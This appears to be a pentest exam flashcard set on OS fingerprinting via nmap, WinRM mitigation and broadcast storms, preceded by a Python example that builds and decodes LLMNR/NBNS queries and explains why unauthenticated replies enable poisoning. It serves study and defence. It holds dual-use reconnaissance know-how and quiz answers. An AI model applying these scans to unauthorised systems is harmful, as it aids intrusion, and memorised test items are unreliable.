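Added example (not part of the original flashcard set, and not Responder's or Windows' code): builders and a decoder for the two fallback queries, so you can recognise them in a capture and see why they are so easy to answer. Both use a DNS-style header with one question; LLMNR carries the bare name, while NBNS carries the NetBIOS first-level encoding (15-character padded name plus a suffix byte, two letters per byte). The transaction ID and the host name looked up are constructed for the demonstration, and the socket calls that would send the packets to 224.0.0.252:5355 and the broadcast address on port 137 are left out so that it runs offline.

```python
"""Builds and decodes the two fallback name queries a Windows host emits when DNS fails:
LLMNR (UDP 5355 to multicast 224.0.0.252) and NBNS (UDP 137 to the subnet broadcast)."""
import struct
from typing import Dict, Tuple

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
NBNS_PORT = 137
QTYPE_A, QTYPE_NB, QCLASS_IN = 0x0001, 0x0020, 0x0001
NBNS_FLAGS_QUERY = 0x0110          # recursion desired + broadcast bit, as seen in real NBNS queries


def encode_dns_name(name: str) -> bytes:
    """DNS label format: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.strip(".").split(".")) + b"\x00"


def decode_dns_name(buf: bytes, offset: int) -> Tuple[str, int]:
    labels = []
    while True:
        n = buf[offset]
        offset += 1
        if n == 0:
            return ".".join(labels), offset
        labels.append(buf[offset:offset + n].decode("ascii"))
        offset += n


def nb_encode(name: str, suffix: int = 0x00) -> str:
    """NetBIOS first-level encoding: the 15-character, space-padded upper-case name plus a
    one-byte suffix (0x00 workstation, 0x20 file server), each nibble mapped to 'A' + nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)


def nb_decode(encoded: str) -> Tuple[str, int]:
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_query(name: str, proto: str, txid: int = 0x1234) -> bytes:
    """12-byte DNS-style header plus one question. LLMNR asks for an A record of the bare
    name; NBNS asks for an NB record (type 0x20) of the first-level-encoded name."""
    if proto == "llmnr":
        flags, qname, qtype = 0x0000, encode_dns_name(name), QTYPE_A
    elif proto == "nbns":
        flags, qname, qtype = NBNS_FLAGS_QUERY, encode_dns_name(nb_encode(name)), QTYPE_NB
    else:
        raise ValueError(f"unknown protocol {proto!r}")
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)   # ID, flags, QD, AN, NS, AR
    return header + qname + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(packet: bytes) -> Dict[str, object]:
    """Decodes either kind of query (for example from a pcap) and returns the name sought;
    a 32-character label with qtype NB is an NBNS query."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", packet[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, offset = decode_dns_name(packet, 12)
    qtype, _qclass = struct.unpack("!HH", packet[offset:offset + 4])
    if qtype == QTYPE_NB and len(qname) == 32:
        name, suffix = nb_decode(qname)
        return {"proto": "nbns", "txid": txid, "name": name, "suffix": suffix,
                "broadcast": bool(flags & 0x0010)}
    return {"proto": "llmnr", "txid": txid, "name": qname, "qtype": qtype}


if __name__ == "__main__":
    for proto in ("llmnr", "nbns"):
        pkt = build_query("fileserv01", proto)
        print(proto, pkt.hex(), parse_query(pkt))
```

Nothing in either packet authenticates the answer: a reply only has to echo the 16-bit transaction ID, which the querier just broadcast, so the first responder on the segment wins. That is the whole basis of LLMNR/NBNS poisoning, and why the remediation is to turn the protocols off rather than to filter them.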

72
Q
During a pentest, your team has asked you to help fingerprint the operating system of a target. Given the following nmap scan results, what is the most likely operating system for the target?
A.macOS
B.Windows
C.Unix
D.None of the answer choices are correct
A

B.Windows

Explanation
Correct Answer: Windows is correct. The nmap port scan results show 135/tcp, 139/tcp and 445/tcp open, based on the SYN/ACK responses from the target. These are the Microsoft RPC endpoint mapper, the NetBIOS session service and SMB over TCP, a combination that almost always indicates a Windows host. To confirm rather than infer, run nmap -O for a TCP/IP stack fingerprint or nmap -sV --script smb-os-discovery, since Samba on Linux or macOS also listens on 139 and 445.

Incorrect Answers: Unix is incorrect because none of the open ports point to a Unix-type system (nothing such as 22/tcp for SSH), and 135/tcp is rarely seen outside Windows (Samba exposes it only when running as an Active Directory domain controller).

macOS is incorrect because the host does not appear to be running macOS; a Mac sharing files over SMB would show 445/tcp but not the Windows RPC endpoint mapper on 135/tcp.

“None of the answers…” is incorrect because at least one answer was correct, which is Windows.

73
Q

During a pentest, you find that the customer’s production environment’s Windows servers all had WinRM enabled, which helped facilitate additional attacks against the network with no restriction. What mitigation strategy would you provide?
A.All of the answer choices are correct
B.Disable the service if not necessary
C.Lock down WinRM to only trusted hosts on the network
D.Apply an ACL in Windows Firewall to restrict access to port 5985/tcp (and 5986/tcp for HTTPS) to authorized IP addresses

A

A.All of the answer choices are correct

Explanation
Correct Answer: All of the answers are correct. All of the answers provide an effective strategy to mitigate the weakness. The biggest issue with the scenario is that no trust relationship was defined (who is authorized to execute commands remotely), thus allowing unrestricted remote execution within the network. WinRM listens on 5985/tcp (HTTP) and 5986/tcp (HTTPS); scoping the Windows Remote Management (HTTP-In) firewall rule to the addresses of the management hosts limits who can reach the service at all, and disabling the service where remote management is not needed removes the exposure entirely. Note that the TrustedHosts list is a client-side setting that governs which servers a client will authenticate to with non-Kerberos methods; it does not restrict who may connect to a server.

Incorrect Answers: All of the other choices are incorrect as individual responses . They all provide an effective mitigation strategy for the weakness described in the scenario, making all answers the correct choice.

74
Q
A broadcast storm is caused by \_\_\_\_\_\_\_\_\_\_\_\_\_\_.
A.Loops in the network
B.Root bridge election
C.Double tagging
D.Expired TTL value
A

A.Loops in the network